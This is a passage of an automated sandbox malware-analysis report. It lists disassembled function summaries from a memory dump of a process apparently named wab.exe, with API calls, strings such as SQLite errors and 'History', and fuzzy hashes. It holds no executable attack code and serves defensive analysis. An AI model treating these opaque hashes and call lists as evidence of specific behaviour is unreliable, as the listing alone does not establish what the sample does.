                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                  • API String ID: 2618321458-3614832568
                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                  APIs
                  • memset.MSVCRT ref: 004185FC
                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@AttributesFilememset
                  • String ID:
                  • API String ID: 776155459-0
                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                  APIs
                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                  • malloc.MSVCRT ref: 00417524
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                  • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                  • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                  • String ID:
                  • API String ID: 2308052813-0
                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                  APIs
                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PathTemp$??3@
                  • String ID: %s\etilqs_$etilqs_
                  • API String ID: 1589464350-1420421710
                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                  APIs
                  • memset.MSVCRT ref: 0040FDD5
                    • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                  • _snwprintf.MSVCRT ref: 0040FE1F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                  • String ID: <%s>%s</%s>$</item>$<item>
                  • API String ID: 1775345501-2769808009
                  • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                  • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                  APIs
                  • wcscpy.MSVCRT ref: 0041477F
                  • wcscpy.MSVCRT ref: 0041479A
                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$CloseCreateFileHandle
                  • String ID: General
                  • API String ID: 999786162-26480598
                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ErrorLastMessage_snwprintf
                  • String ID: Error$Error %d: %s
                  • API String ID: 313946961-1552265934
                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: foreign key constraint failed$new$oid$old
                  • API String ID: 0-1953309616
                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                  APIs
                  Strings
                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                  • API String ID: 3510742995-272990098
                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: gj
                  • API String ID: 1297977491-4203073231
                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                  APIs
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                  APIs
                  • AreFileApisANSI.KERNEL32 ref: 00417497
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                  • malloc.MSVCRT ref: 004174BD
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                  • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                  • String ID:
                  • API String ID: 2903831945-0
                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                  APIs
                  • GetParent.USER32(?), ref: 0040D453
                  • GetWindowRect.USER32(?,?), ref: 0040D460
                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$ClientParentPoints
                  • String ID:
                  • API String ID: 4247780290-0
                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                  APIs
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                  • memset.MSVCRT ref: 004450CD
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                  • String ID:
                  • API String ID: 1471605966-0
                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                  APIs
                  • wcscpy.MSVCRT ref: 0044475F
                  • wcscat.MSVCRT ref: 0044476E
                  • wcscat.MSVCRT ref: 0044477F
                  • wcscat.MSVCRT ref: 0044478E
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                  • String ID: \StringFileInfo\
                  • API String ID: 102104167-2245444037
                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$??3@
                  • String ID: g4@
                  • API String ID: 3314356048-2133833424
                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _memicmpwcslen
                  • String ID: @@@@$History
                  • API String ID: 1872909662-685208920
                  • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                  • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                  APIs
                  • memset.MSVCRT ref: 004100FB
                  • memset.MSVCRT ref: 00410112
                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                  • _snwprintf.MSVCRT ref: 00410141
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf_wcslwrwcscpy
                  • String ID: </%s>
                  • API String ID: 3400436232-259020660
                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                  APIs
                  • memset.MSVCRT ref: 0040D58D
                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ChildEnumTextWindowWindowsmemset
                  • String ID: caption
                  • API String ID: 1523050162-4135340389
                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                  APIs
                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                  • String ID: MS Sans Serif
                  • API String ID: 210187428-168460110
                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClassName_wcsicmpmemset
                  • String ID: edit
                  • API String ID: 2747424523-2167791130
                  • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                  • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                  • String ID: SHAutoComplete$shlwapi.dll
                  • API String ID: 3150196962-1506664499
                  • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                  • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memcmp
                  • String ID:
                  • API String ID: 3384217055-0
                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                  • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                  APIs
                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                  • GetMenu.USER32(?), ref: 00410F8D
                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                  • String ID:
                  • API String ID: 1889144086-0
                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                  APIs
                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
